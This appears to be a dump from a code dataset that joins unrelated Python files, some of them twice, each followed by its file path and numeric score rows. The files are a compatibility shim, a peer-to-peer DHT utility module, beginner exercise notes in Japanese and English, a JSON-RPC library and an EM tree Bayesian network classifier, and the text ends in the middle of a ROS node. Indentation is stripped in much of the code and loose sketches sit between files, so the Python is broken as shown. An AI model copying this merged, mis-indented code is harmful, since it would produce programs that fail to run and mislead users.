return (a > b) - (a < b)
input = input
from string import ascii_lowercase
import urllib.parse as urllib
import urllib.parse as urlparse
from urllib.request import urlretrieve
console_encoding = sys.__stdout__.encoding
def console_to_str(s):
        ''' From pypa/pip project, pip.backwardcompat. License MIT. '''
try:
return s.decode(console_encoding)
except UnicodeDecodeError:
return s.decode('utf_8')
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise(value.with_traceback(tb))
raise value
number_types = integer_types + (float,)
| 0.233619 | 0.238683 |
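A small sketch of calling code leaning on the shims above so it runs unchanged on Python 2 and 3; it assumes the module is importable as mt940._compat (per the repo path).

import sys
from mt940._compat import iteritems, text_type, cmp, reraise, StringIO

for key, value in iteritems({'balance': 100}):   # dict iteration on either version
    print(key, value)

print(isinstance(u'EUR', text_type))             # True on both major versions
print(cmp(3, 5), cmp(5, 5), cmp(7, 5))           # -1 0 1

buf = StringIO()
buf.write(u'same text-buffer API either way')

try:
    raise ValueError('boom')
except ValueError:
    tp, value, tb = sys.exc_info()
    try:
        reraise(tp, value, tb)                   # re-raise with the original traceback
    except ValueError as exc:
        print('re-raised:', exc)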
from socket import inet_aton
from struct import pack, unpack
from types import IntType, StringType, TupleType
from ncrypt.digest import DigestType, Digest
from ncrypt.rsa import RSAKey, RSAError
from nitro.bencode import encode
from cspace.dht.params import DHT_ID_LENGTH, DHT_ID_MAX
digestType = DigestType( 'SHA1' )
digestLength = digestType.size()
assert digestLength == DHT_ID_LENGTH
def toId( x ) :
return Digest(digestType).digest(x)
def idToNum( x ) :
return long(x.encode('hex'),16)
def numToId( numId ) :
s = hex( numId )
assert s.startswith('0x')
if s.endswith('L') : s = s[2:-1]
else : s = s[2:]
if len(s) < 2*DHT_ID_LENGTH :
s = ('0'*(2*DHT_ID_LENGTH-len(s))) + s
x = s.decode('hex')
assert len(x) == DHT_ID_LENGTH
return x
def checkIP( ip ) :
if type(ip) is not StringType : return False
if not ip : return False
try :
inet_aton( ip )
return True
except :
return False
def checkPort( port ) :
if type(port) is not IntType : return False
return 0 < port < 65536
def checkAddr( addr ) :
if type(addr) is not TupleType :
return False
if len(addr) != 2 : return False
if not checkIP(addr[0]) : return False
return checkPort( addr[1] )
def addrToStr( addr ) :
ip = unpack( 'L', inet_aton(addr[0]) )[0]
port = addr[1]
return pack( '!LH', ip, port )
def addrToId( addr ) :
return toId( addrToStr(addr) )
def verifySignature( publicKey, data, updateLevel, signature ) :
payload = encode( ('DHT-DATA',data,updateLevel) )
if type(publicKey) is str :
k = RSAKey()
try :
k.fromDER_PublicKey( publicKey )
except RSAError :
return False
else :
k = publicKey
try :
digest = Digest(digestType).digest( payload )
k.verify( signature, digest, digestType )
return True
except RSAError :
return False
def computeSignature( rsaKey, data, updateLevel ) :
payload = encode( ('DHT-DATA',data,updateLevel) )
digest = Digest(digestType).digest( payload )
return rsaKey.sign( digest, digestType )
|
cspace/dht/util.py
|
from socket import inet_aton
from struct import pack, unpack
from types import IntType, StringType, TupleType
from ncrypt.digest import DigestType, Digest
from ncrypt.rsa import RSAKey, RSAError
from nitro.bencode import encode
from cspace.dht.params import DHT_ID_LENGTH, DHT_ID_MAX
digestType = DigestType( 'SHA1' )
digestLength = digestType.size()
assert digestLength == DHT_ID_LENGTH
def toId( x ) :
return Digest(digestType).digest(x)
def idToNum( x ) :
return long(x.encode('hex'),16)
def numToId( numId ) :
s = hex( numId )
assert s.startswith('0x')
if s.endswith('L') : s = s[2:-1]
else : s = s[2:]
if len(s) < 2*DHT_ID_LENGTH :
s = ('0'*(2*DHT_ID_LENGTH-len(s))) + s
x = s.decode('hex')
assert len(x) == DHT_ID_LENGTH
return x
def checkIP( ip ) :
if type(ip) is not StringType : return False
if not ip : return False
try :
inet_aton( ip )
return True
except :
return False
def checkPort( port ) :
if type(port) is not IntType : return False
return 0 < port < 65536
def checkAddr( addr ) :
if type(addr) is not TupleType :
return False
if len(addr) != 2 : return False
if not checkIP(addr[0]) : return False
return checkPort( addr[1] )
def addrToStr( addr ) :
ip = unpack( 'L', inet_aton(addr[0]) )[0]
port = addr[1]
return pack( '!LH', ip, port )
def addrToId( addr ) :
return toId( addrToStr(addr) )
def verifySignature( publicKey, data, updateLevel, signature ) :
payload = encode( ('DHT-DATA',data,updateLevel) )
if type(publicKey) is str :
k = RSAKey()
try :
k.fromDER_PublicKey( publicKey )
except RSAError :
return False
else :
k = publicKey
try :
digest = Digest(digestType).digest( payload )
k.verify( signature, digest, digestType )
return True
except RSAError :
return False
def computeSignature( rsaKey, data, updateLevel ) :
payload = encode( ('DHT-DATA',data,updateLevel) )
digest = Digest(digestType).digest( payload )
return rsaKey.sign( digest, digestType )
| 0.351089 | 0.379723 |
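The id/number conversions in the DHT util above are written for Python 2 (long, str.encode('hex')). As a point of comparison, here is a hedged Python 3 sketch of the same round trip using int.from_bytes/int.to_bytes; DHT_ID_LENGTH is assumed to be 20, matching the SHA1 digest-size assertion in the module.

import hashlib

DHT_ID_LENGTH = 20  # assumed: SHA1 digest size, as asserted in the module above

def to_id(x: bytes) -> bytes:
    return hashlib.sha1(x).digest()

def id_to_num(node_id: bytes) -> int:
    # same as long(x.encode('hex'), 16): read the digest as a big-endian integer
    return int.from_bytes(node_id, 'big')

def num_to_id(num: int) -> bytes:
    # same as the zero-padded hex decode in numToId
    return num.to_bytes(DHT_ID_LENGTH, 'big')

node_id = to_id(b'127.0.0.1:6881')
assert len(node_id) == DHT_ID_LENGTH
assert num_to_id(id_to_num(node_id)) == node_id
print(id_to_num(node_id))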
from random import randint
def dice():
num = randint(1, 6)
return num
for i in range(5):
    result = dice()  # dice() takes no arguments
    print(result)
from random import randint
def dice():
num = randint(1, 6)
return num
for i in range(5):
dice1 = dice()
dice2 = dice()
sum = dice1 + dice2
print(f"{dice1} and {dice2} de kaikei {sum}")
# =============================================================================
# Pg 235
def mile2meter(mile):
meter = mile * 1609.344
return meter
distance = mile2meter(20)
print(distance)
print(mile2meter(30))
# =============================================================================
# Pg236
def triangle(base, height):
area = base * height / 2
return area
b = 15
h = 13
v = triangle(b, h)
print(f"底辺{b}、高さ{h}の参画型の面積は {v :.1f}です。")
# =============================================================================
# Pg237
from random import randint
def dice():
num = randint(1, 6)
return num
def dicegame():
dice1 = dice()
dice2 = dice()
sum = dice1 + dice2
if sum%2 == 0:
print(f"{dice1}と{dice2}で合計{sum}、 偶数")
else:
print(f"{dice1}と{dice2}で合計は{sum}、奇数")
for i in range(5):
dicegame()
print("ゲーム終了")
# Pg 238
def calc(num):
unit_price = 180
if not num.isdigit():
return None
price = int(num) * unit_price
return price
while True:
num = input("個数を入れてください。 (q で終了)")
if num == "":
continue
elif num == "q":
break
result = calc(num)
print(result)
# =========================================================================
# 07/16 review
# A function is ... a collection of processing steps
# Used together with loops.
# Bundles processing into one place
# Return value: the result of the function's processing
# Arguments: the values passed in when calling the function
#
# foo bar baz
# hoge fuga piyo
#
# Review problems 07/16
def addition(n1, n2):
return n1 + n2
value = addition(10,20)
print(value)
def calc(operator, n1, n2):
if operator == 1:
return n1 + n2
if operator == 2:
return n1 - n2
if operator == 3:
return n1 * n2
if operator == 4:
return n1 / n2
else:
print("Enter digits")
x = calc("a", 2, 3)
print("result:", x)
# Using a dictionary instead of if
def calc2(ope, n1, n2):
return {
1: n1 + n2,
2: n1 - n2,
3: n1 * n2,
4: n1 / n2
}.get(ope)
y = calc2(1, 4, 5)
print(y)
# because sum() does not return a value: it prints when the function is called,
# so x ends up as None
def sum(n1, n2):
print(n1 + n2)
x = sum(1, 2)
print("x",x)
def compare(n1, n2):
if n1 == n2:
return True
else:
return False
x = compare(1, 1)
print(x)
# =============================================================================
# Pg239
def calc(num):
unit_price = 180
try:
num = float(num)
return num * unit_price
except:
return None
while True:
num = input("個数を入れてください。 (q で終了)")
if num == "":
continue
elif num == "q":
break
result = calc(num)
print(result)
# =============================================================================
# Pg240
# Variable scope
v = 2 # global variable
def calc():
    # v = 2 # local variable
# v = v * 10 (UnboundLocalError: local variable 'v' referenced before assignment) it's trying to make a calculation before it know's it's value
# v = 1 CAN reassign variable
x = v * 10
ans = 3 * x
print(ans)
calc()
print(v)
|
class-notes/chapter_10/c10-1.py
|
from random import randint
def dice():
num = randint(1, 6)
return num
for i in range(5):
    result = dice()  # dice() takes no arguments
    print(result)
from random import randint
def dice():
num = randint(1, 6)
return num
for i in range(5):
dice1 = dice()
dice2 = dice()
sum = dice1 + dice2
print(f"{dice1} and {dice2} de kaikei {sum}")
# =============================================================================
# Pg 235
def mile2meter(mile):
meter = mile * 1609.344
return meter
distance = mile2meter(20)
print(distance)
print(mile2meter(30))
# =============================================================================
# Pg236
def triangle(base, height):
area = base * height / 2
return area
b = 15
h = 13
v = triangle(b, h)
print(f"底辺{b}、高さ{h}の参画型の面積は {v :.1f}です。")
# =============================================================================
# Pg237
from random import randint
def dice():
num = randint(1, 6)
return num
def dicegame():
dice1 = dice()
dice2 = dice()
sum = dice1 + dice2
if sum%2 == 0:
print(f"{dice1}と{dice2}で合計{sum}、 偶数")
else:
print(f"{dice1}と{dice2}で合計は{sum}、奇数")
for i in range(5):
dicegame()
print("ゲーム終了")
# Pg 238
def calc(num):
unit_price = 180
if not num.isdigit():
return None
price = int(num) * unit_price
return price
while True:
num = input("個数を入れてください。 (q で終了)")
if num == "":
continue
elif num == "q":
break
result = calc(num)
print(result)
# =========================================================================
# 07/16 review
# A function is ... a collection of processing steps
# Used together with loops.
# Bundles processing into one place
# Return value: the result of the function's processing
# Arguments: the values passed in when calling the function
#
# foo bar baz
# hoge fuga piyo
#
# Review problems 07/16
def addition(n1, n2):
return n1 + n2
value = addition(10,20)
print(value)
def calc(operator, n1, n2):
if operator == 1:
return n1 + n2
if operator == 2:
return n1 - n2
if operator == 3:
return n1 * n2
if operator == 4:
return n1 / n2
else:
print("Enter digits")
x = calc("a", 2, 3)
print("result:", x)
# Using a dictionary instead of if
def calc2(ope, n1, n2):
return {
1: n1 + n2,
2: n1 - n2,
3: n1 * n2,
4: n1 / n2
}.get(ope)
y = calc2(1, 4, 5)
print(y)
# because sum() does not return a value: it prints when the function is called,
# so x ends up as None
def sum(n1, n2):
print(n1 + n2)
x = sum(1, 2)
print("x",x)
def compare(n1, n2):
if n1 == n2:
return True
else:
return False
x = compare(1, 1)
print(x)
# =============================================================================
# Pg239
def calc(num):
unit_price = 180
try:
num = float(num)
return num * unit_price
except:
return None
while True:
num = input("個数を入れてください。 (q で終了)")
if num == "":
continue
elif num == "q":
break
result = calc(num)
print(result)
# =============================================================================
# Pg240
# Variable scope
v = 2 # global variable
def calc():
    # v = 2 # local variable
# v = v * 10 (UnboundLocalError: local variable 'v' referenced before assignment) it's trying to make a calculation before it know's it's value
# v = 1 CAN reassign variable
x = v * 10
ans = 3 * x
print(ans)
calc()
print(v)
| 0.236957 | 0.211987 |
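One refinement worth noting for the notes above: calc2 builds the whole dictionary before .get(), so every operation runs eagerly and calc2(1, 4, 0) raises ZeroDivisionError even though only addition was requested. A sketch with lambdas defers each operation until one is selected; calc3 is just an illustrative name.

def calc3(ope, n1, n2):
    operations = {
        1: lambda: n1 + n2,
        2: lambda: n1 - n2,
        3: lambda: n1 * n2,
        4: lambda: n1 / n2,
    }
    selected = operations.get(ope)
    return selected() if selected else None

print(calc3(1, 4, 0))   # 4 -- no ZeroDivisionError, the division was never evaluated
print(calc3(4, 4, 2))   # 2.0
print(calc3(9, 4, 2))   # None for an unknown operator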
import json
class RPCObject:
"""Just group of other classes"""
__slots__ = ()
class RPCError(BaseException, RPCObject):
"""JSON-RPC 2.0 error object"""
__slots__ = 'code', 'message', 'data'
def __init__(self, code, message='error', data=None):
self.code, self.message, self.data = code, message, data
def __repr__(self):
return '<JSON-RPC 2.0 Error [{}]: {} - "{}">'.format(self.code, self.message, self.data)
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(code=self.code, message=self.message)
if self.data is not None:
d['data'] = self.data
return d
def add_data(self, data):
"""Create copy of object with data added"""
return type(self).__call__(self.code, self.message, data)
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
return cls(d['code'], d['message'], d.get('data'))
PARSE_ERROR = RPCError(-32700, 'Parse error')
INVALID_REQUEST_ERROR = RPCError(-32600, 'Invalid Request')
METHOD_NOT_FOUND_ERROR = RPCError(-32601, 'Method not found')
INVALID_PARAMS_ERROR = RPCError(-32602, 'Invalid params')
INTERNAL_ERROR = RPCError(-32603, 'Internal error')
SERVER_ERROR = RPCError(-32000, 'Server error')
class RPCRequest(RPCObject):
"""JSON-RPC 2.0 request/notification object"""
__slots__ = 'id', 'method', 'params'
def __init__(self, method, params, id=None):
assert isinstance(method, str), '"method" MUST be str'
assert isinstance(params, (tuple, list, dict)) or params is None, '"params" MUST be tuple, list, dict or None'
assert isinstance(id, (int, str)) or id is None, '"id" MUST be int, str or None'
self.method, self.params, self.id = method, params, id
def __repr__(self):
return f'<JSON-RPC 2.0 Request [{self.id}]: {self.method}({self.params})>'
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(jsonrpc='2.0', method=self.method, params=self.params)
if self.id is not None:
d['id'] = self.id
return d
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
try:
return cls(d['method'], d['params'], d.get('id'))
except (KeyError, AssertionError) as e:
raise INVALID_REQUEST_ERROR.add_data('{}: {}'.format(type(e), str(e)))
class RPCResponse(RPCObject):
"""JSON-RPC 2.0 response object"""
__slots__ = 'id', 'result', 'error'
def __init__(self, id, result):
assert isinstance(id, (int, str)) or id is None, '"id" MUST be int, str or None'
self.id = id
if isinstance(result, RPCError):
self.error, self.result = result, None
else:
self.error, self.result = None, result
def __repr__(self):
        return f'<JSON-RPC 2.0 Response [{self.id}]: {self.error if self.result is None else self.result}>'
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(jsonrpc='2.0', id=self.id)
if self.error is not None:
d['error'] = self.error.to_dict()
if self.result is not None:
d['result'] = self.result
return d
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
try:
result = d.get('result')
error = d.get('error')
if (result is not None and error is not None) or (result is None and error is None):
raise INVALID_REQUEST_ERROR.add_data('MUST contain result XOR error')
return cls(d['id'], result if error is None else RPCError.from_dict(error))
except (KeyError, AssertionError) as e:
raise INVALID_REQUEST_ERROR.add_data('{}: {}'.format(type(e), str(e)))
class RPCDispatcher:
"""Get decoded requests and return results (success or error) from corresponding methods"""
def __init__(self, methods):
self.methods = methods if isinstance(methods, dict) else {func.__name__: func for func in methods}
def dispatch(self, request):
"""Check if request is correct, execute RPC method and return response"""
func = self.methods.get(request.method)
if func is None:
return None if request.id is None else RPCResponse(request.id, METHOD_NOT_FOUND_ERROR)
else:
try:
result = func(**request.params) if isinstance(request.params, dict) else func(*request.params)
return None if request.id is None else RPCResponse(request.id, result)
except TypeError as e:
return None if request.id is None else RPCResponse(request.id, INVALID_PARAMS_ERROR.add_data(str(e)))
except BaseException as e:
return None if request.id is None else RPCResponse(request.id, INTERNAL_ERROR.add_data(str(e)))
class RPCSerializer:
"""Methods to serialize and deserialize JSON-RPC objects"""
def __init__(self, ensure_ascii=True, length_bytes=None, order='big', separator=b''):
self.ensure_ascii, self.length_bytes, self.separator, self.order = ensure_ascii, length_bytes, separator, order
    def to_bytes(self, obj):
        """Serialize JSON-RPC object to bytes, applying the optional length prefix and separator"""
        try:
            packed = json.dumps(obj.to_dict(), separators=(',', ':'), ensure_ascii=self.ensure_ascii).encode()
        except BaseException:
            packed = json.dumps(RPCResponse(obj.id, INTERNAL_ERROR).to_dict(),
                                separators=(',', ':'), ensure_ascii=self.ensure_ascii).encode()
        return b''.join((len(packed).to_bytes(self.length_bytes, self.order) if self.length_bytes else b'',
                         packed, self.separator))
def from_bytes(self, raw):
"""Extract JSON-RPC objects from byte string"""
res = list()
try:
data = json.loads(raw.decode())
if not isinstance(data, list):
data = (data, )
            for d in data:
                try:
                    if not isinstance(d, dict):
                        res.append(INVALID_REQUEST_ERROR.add_data('Not object'))
                        continue
                    if 'jsonrpc' not in d:
                        res.append(INVALID_REQUEST_ERROR.add_data('No "jsonrpc" key'))
                        continue
                    if d['jsonrpc'] != '2.0':
                        res.append(INVALID_REQUEST_ERROR.add_data('JSON-RPC version != 2.0'))
                        continue
if 'method' in d:
res.append(RPCRequest.from_dict(d))
elif 'result' in d or 'error' in d:
res.append(RPCResponse.from_dict(d))
else:
res.append(INVALID_REQUEST_ERROR.add_data('Not request or response'))
except RPCError as e:
res.append(e)
except BaseException as e:
res.append(SERVER_ERROR)
except json.JSONDecodeError:
res.append(PARSE_ERROR.add_data('JSON error'))
except UnicodeDecodeError:
res.append(PARSE_ERROR.add_data('UTF-8 error'))
except BaseException:
res.append(SERVER_ERROR)
return res
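# --- Illustrative usage sketch (my addition, not part of the original module) ---
# Shows how the pieces above fit together: a dispatcher over plain functions plus
# the serializer for the wire format. The `add` method name is an example only.
if __name__ == '__main__':
    def add(a, b):
        return a + b

    dispatcher = RPCDispatcher([add])              # becomes {'add': add}
    serializer = RPCSerializer()

    request = RPCRequest('add', [2, 3], id=1)
    raw = serializer.to_bytes(request)             # wire bytes for the request
    decoded = serializer.from_bytes(raw)[0]        # back to an RPCRequest object
    response = dispatcher.dispatch(decoded)        # RPCResponse with result 5
    print(serializer.to_bytes(response))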
|
dcnnt/common/jsonrpc.py
|
import json
class RPCObject:
"""Just group of other classes"""
__slots__ = ()
class RPCError(BaseException, RPCObject):
"""JSON-RPC 2.0 error object"""
__slots__ = 'code', 'message', 'data'
def __init__(self, code, message='error', data=None):
self.code, self.message, self.data = code, message, data
def __repr__(self):
return '<JSON-RPC 2.0 Error [{}]: {} - "{}">'.format(self.code, self.message, self.data)
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(code=self.code, message=self.message)
if self.data is not None:
d['data'] = self.data
return d
def add_data(self, data):
"""Create copy of object with data added"""
return type(self).__call__(self.code, self.message, data)
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
return cls(d['code'], d['message'], d.get('data'))
PARSE_ERROR = RPCError(-32700, 'Parse error')
INVALID_REQUEST_ERROR = RPCError(-32600, 'Invalid Request')
METHOD_NOT_FOUND_ERROR = RPCError(-32601, 'Method not found')
INVALID_PARAMS_ERROR = RPCError(-32602, 'Invalid params')
INTERNAL_ERROR = RPCError(-32603, 'Internal error')
SERVER_ERROR = RPCError(-32000, 'Server error')
class RPCRequest(RPCObject):
"""JSON-RPC 2.0 request/notification object"""
__slots__ = 'id', 'method', 'params'
def __init__(self, method, params, id=None):
assert isinstance(method, str), '"method" MUST be str'
assert isinstance(params, (tuple, list, dict)) or params is None, '"params" MUST be tuple, list, dict or None'
assert isinstance(id, (int, str)) or id is None, '"id" MUST be int, str or None'
self.method, self.params, self.id = method, params, id
def __repr__(self):
return f'<JSON-RPC 2.0 Request [{self.id}]: {self.method}({self.params})>'
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(jsonrpc='2.0', method=self.method, params=self.params)
if self.id is not None:
d['id'] = self.id
return d
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
try:
return cls(d['method'], d['params'], d.get('id'))
except (KeyError, AssertionError) as e:
raise INVALID_REQUEST_ERROR.add_data('{}: {}'.format(type(e), str(e)))
class RPCResponse(RPCObject):
"""JSON-RPC 2.0 response object"""
__slots__ = 'id', 'result', 'error'
def __init__(self, id, result):
assert isinstance(id, (int, str)) or id is None, '"id" MUST be int, str or None'
self.id = id
if isinstance(result, RPCError):
self.error, self.result = result, None
else:
self.error, self.result = None, result
def __repr__(self):
        return f'<JSON-RPC 2.0 Response [{self.id}]: {self.error if self.result is None else self.result}>'
def to_dict(self):
"""Convert to JSON-RPC 2.0 dictionary"""
d = dict(jsonrpc='2.0', id=self.id)
if self.error is not None:
d['error'] = self.error.to_dict()
if self.result is not None:
d['result'] = self.result
return d
@classmethod
def from_dict(cls, d):
"""Create RPCRequest object from dictionary"""
try:
result = d.get('result')
error = d.get('error')
if (result is not None and error is not None) or (result is None and error is None):
raise INVALID_REQUEST_ERROR.add_data('MUST contain result XOR error')
return cls(d['id'], result if error is None else RPCError.from_dict(error))
except (KeyError, AssertionError) as e:
raise INVALID_REQUEST_ERROR.add_data('{}: {}'.format(type(e), str(e)))
class RPCDispatcher:
"""Get decoded requests and return results (success or error) from corresponding methods"""
def __init__(self, methods):
self.methods = methods if isinstance(methods, dict) else {func.__name__: func for func in methods}
def dispatch(self, request):
"""Check if request is correct, execute RPC method and return response"""
func = self.methods.get(request.method)
if func is None:
return None if request.id is None else RPCResponse(request.id, METHOD_NOT_FOUND_ERROR)
else:
try:
result = func(**request.params) if isinstance(request.params, dict) else func(*request.params)
return None if request.id is None else RPCResponse(request.id, result)
except TypeError as e:
return None if request.id is None else RPCResponse(request.id, INVALID_PARAMS_ERROR.add_data(str(e)))
except BaseException as e:
return None if request.id is None else RPCResponse(request.id, INTERNAL_ERROR.add_data(str(e)))
class RPCSerializer:
"""Methods to serialize and deserialize JSON-RPC objects"""
def __init__(self, ensure_ascii=True, length_bytes=None, order='big', separator=b''):
self.ensure_ascii, self.length_bytes, self.separator, self.order = ensure_ascii, length_bytes, separator, order
    def to_bytes(self, obj):
        """Serialize JSON-RPC object to bytes, applying the optional length prefix and separator"""
        try:
            packed = json.dumps(obj.to_dict(), separators=(',', ':'), ensure_ascii=self.ensure_ascii).encode()
        except BaseException:
            packed = json.dumps(RPCResponse(obj.id, INTERNAL_ERROR).to_dict(),
                                separators=(',', ':'), ensure_ascii=self.ensure_ascii).encode()
        return b''.join((len(packed).to_bytes(self.length_bytes, self.order) if self.length_bytes else b'',
                         packed, self.separator))
def from_bytes(self, raw):
"""Extract JSON-RPC objects from byte string"""
res = list()
try:
data = json.loads(raw.decode())
if not isinstance(data, list):
data = (data, )
            for d in data:
                try:
                    if not isinstance(d, dict):
                        res.append(INVALID_REQUEST_ERROR.add_data('Not object'))
                        continue
                    if 'jsonrpc' not in d:
                        res.append(INVALID_REQUEST_ERROR.add_data('No "jsonrpc" key'))
                        continue
                    if d['jsonrpc'] != '2.0':
                        res.append(INVALID_REQUEST_ERROR.add_data('JSON-RPC version != 2.0'))
                        continue
if 'method' in d:
res.append(RPCRequest.from_dict(d))
elif 'result' in d or 'error' in d:
res.append(RPCResponse.from_dict(d))
else:
res.append(INVALID_REQUEST_ERROR.add_data('Not request or response'))
except RPCError as e:
res.append(e)
except BaseException as e:
res.append(SERVER_ERROR)
except json.JSONDecodeError:
res.append(PARSE_ERROR.add_data('JSON error'))
except UnicodeDecodeError:
res.append(PARSE_ERROR.add_data('UTF-8 error'))
except BaseException:
res.append(SERVER_ERROR)
return res
| 0.558207 | 0.203173 |
from functools import reduce
from operator import mul
from typing import Any
import networkx as nx
import numpy as np
import pandas as pd
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.metrics import mutual_info_score
from sklearn.metrics.cluster import contingency_matrix
from sklearn.utils.multiclass import unique_labels
from sklearn.utils.validation import check_is_fitted
from ._utils import bootstrap
from .tree import TreeBayesianNetworkClassifier
class ExpectationMaximizationTreeBayesianNetworkClassifier(
    BaseEstimator, ClassifierMixin
):
def __init__(self, *, iterations: int = 100, bootstraps: int = 10):
"""Initializes this ``ExpectationMaximizationTreeBayesianNetworkClassifier``.
Args:
iterations: The maximum number of iterations of the EM algorithm to perform.
bootstraps: The exact number of each of bootstrap samples and bagging models.
"""
self.iterations = iterations
self.bootstraps = bootstraps
def fit(
self, X: pd.DataFrame, y: pd.Series
) -> "ExpectationMaximizationTreeBayesianNetworkClassifier":
"""Fits this ``ExpectationMaximizationTreeBayesianNetworkClassifier``.
Returns:
ExpectationMaximizationTreeBayesianNetworkClassifier: This object, fitted.
"""
# validate model parameters
if self.iterations <= 0:
raise ValueError(f"Iterations must be positive, but is {self.iterations}")
if self.bootstraps <= 0:
raise ValueError(f"Bootstraps must be positive, but is {self.bootstraps}")
# validate method arguments
if len(X) <= 0:
raise ValueError(f"The length of X must be positive, but is {len(X)}")
if len(X) != len(y):
raise ValueError(
f"The length of X and y must be equal, but are [{len(X)}, {len(y)}]"
)
# convenience variables
k = self.bootstraps
# initialize model
clfs = [TreeBayesianNetworkClassifier().fit(*bootstrap(X, y)) for _ in range(k)]
clfs_weights = pd.Series(np.full(k, 1 / k))
# apply Expectation-Maximization (EM) algorithm
is_converged = False
i = 0
while (i := i + 1) <= self.iterations and not is_converged:
# "expect" likelihood of each observation for each mixture component
expected = (clf.expect(X, y) for clf in clfs)
weighted = (e * w for e, w in zip(expected, clfs_weights))
df = pd.DataFrame({i_clf: sr for i_clf, sr in enumerate(weighted)})
summed_x_row = df.apply(np.sum, axis=1)
normalized_x_row = df.apply(lambda col: col / summed_x_row) # DataFrame
summed_x_col = normalized_x_row.sum()
normalized_x_col = summed_x_col / summed_x_col.sum() # Series
# "maximize" mixture ensemble weights
clfs_weights = normalized_x_col
# "maximize" each mixture component
row_weights_x_clf = (
normalized_x_row.iloc[:, i_clf] / summed_x_col.iloc[i_clf]
for i_clf in range(k)
)
clfs = [
TreeBayesianNetworkClassifier().fit(X, y, row_weights)
for row_weights in row_weights_x_clf
]
# TODO test for convergence (to be able to stop early)
self.classifiers_ = clfs
self.weights_ = clfs_weights
return self
def predict(self, X: pd.DataFrame) -> pd.Series:
check_is_fitted(self, ["classifiers_", "weights_"])
df = pd.DataFrame(
{
"preds": [clf.predict(X) for clf in self.classifiers_],
"weights": self.weights_,
}
)
return df.groupby("preds")["weights"].sum().idxmax()
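# --- Illustrative sketch of the E-step bookkeeping above (my addition, toy numbers) ---
# With 2 mixture components and 3 observations: per-row normalization yields the
# responsibilities, and the re-normalized column sums become the new mixture weights.
if __name__ == "__main__":
    likelihoods = pd.DataFrame({0: [0.2, 0.6, 0.1], 1: [0.1, 0.2, 0.3]})  # weighted P(x_i | clf_j)
    summed_x_row = likelihoods.sum(axis=1)                    # per-observation totals
    responsibilities = likelihoods.div(summed_x_row, axis=0)  # each row now sums to 1
    summed_x_col = responsibilities.sum()                     # expected counts per component
    new_weights = summed_x_col / summed_x_col.sum()           # updated weights, sum to 1
    print(new_weights.values)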
|
src/hw4/expectation_maximization.py
|
from functools import reduce
from operator import mul
from typing import Any
import networkx as nx
import numpy as np
import pandas as pd
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.metrics import mutual_info_score
from sklearn.metrics.cluster import contingency_matrix
from sklearn.utils.multiclass import unique_labels
from sklearn.utils.validation import check_is_fitted
from ._utils import bootstrap
from .tree import TreeBayesianNetworkClassifier
class ExpectationMaximizationTreeBayesianNetworkClassifier(
    BaseEstimator, ClassifierMixin
):
def __init__(self, *, iterations: int = 100, bootstraps: int = 10):
"""Initializes this ``ExpectationMaximizationTreeBayesianNetworkClassifier``.
Args:
iterations: The maximum number of iterations of the EM algorithm to perform.
bootstraps: The exact number of each of bootstrap samples and bagging models.
"""
self.iterations = iterations
self.bootstraps = bootstraps
def fit(
self, X: pd.DataFrame, y: pd.Series
) -> "ExpectationMaximizationTreeBayesianNetworkClassifier":
"""Fits this ``ExpectationMaximizationTreeBayesianNetworkClassifier``.
Returns:
ExpectationMaximizationTreeBayesianNetworkClassifier: This object, fitted.
"""
# validate model parameters
if self.iterations <= 0:
raise ValueError(f"Iterations must be positive, but is {self.iterations}")
if self.bootstraps <= 0:
raise ValueError(f"Bootstraps must be positive, but is {self.bootstraps}")
# validate method arguments
if len(X) <= 0:
raise ValueError(f"The length of X must be positive, but is {len(X)}")
if len(X) != len(y):
raise ValueError(
f"The length of X and y must be equal, but are [{len(X)}, {len(y)}]"
)
# convenience variables
k = self.bootstraps
# initialize model
clfs = [TreeBayesianNetworkClassifier().fit(*bootstrap(X, y)) for _ in range(k)]
clfs_weights = pd.Series(np.full(k, 1 / k))
# apply Expectation-Maximization (EM) algorithm
is_converged = False
i = 0
while (i := i + 1) <= self.iterations and not is_converged:
# "expect" likelihood of each observation for each mixture component
expected = (clf.expect(X, y) for clf in clfs)
weighted = (e * w for e, w in zip(expected, clfs_weights))
df = pd.DataFrame({i_clf: sr for i_clf, sr in enumerate(weighted)})
summed_x_row = df.apply(np.sum, axis=1)
normalized_x_row = df.apply(lambda col: col / summed_x_row) # DataFrame
summed_x_col = normalized_x_row.sum()
normalized_x_col = summed_x_col / summed_x_col.sum() # Series
# "maximize" mixture ensemble weights
clfs_weights = normalized_x_col
# "maximize" each mixture component
row_weights_x_clf = (
normalized_x_row.iloc[:, i_clf] / summed_x_col.iloc[i_clf]
for i_clf in range(k)
)
clfs = [
TreeBayesianNetworkClassifier().fit(X, y, row_weights)
for row_weights in row_weights_x_clf
]
# TODO test for convergence (to be able to stop early)
self.classifiers_ = clfs
self.weights_ = clfs_weights
return self
def predict(self, X: pd.DataFrame) -> pd.Series:
check_is_fitted(self, ["classifiers_", "weights_"])
df = pd.DataFrame(
{
"preds": [clf.predict(X) for clf in self.classifiers_],
"weights": self.weights_,
}
)
return df.groupby("preds")["weights"].sum().idxmax()
| 0.906624 | 0.503601 |
import os, sys, argparse, errno, yaml, time, datetime
import rospy, rospkg
import numpy as np
from road_following.msg import Inference
from road_following.cfg import PID_ControlConfig
from road_following.srv import save_action, save_actionResponse
from rosky_msgs.msg import Twist2DStamped
from dynamic_reconfigure.server import Server
class Inference_To_Reaction(object):
def __init__(self):
self.package = "road_following"
self.node_name = rospy.get_name()
self.veh_name = self.node_name.split("/")[1]
rospy.loginfo("[{}] Initializing road_inference_to_reaction.py......".format(self.node_name))
self.start = rospy.wait_for_message("/" + self.veh_name +"/road_model_inference/inference", Inference)
# ros parameter
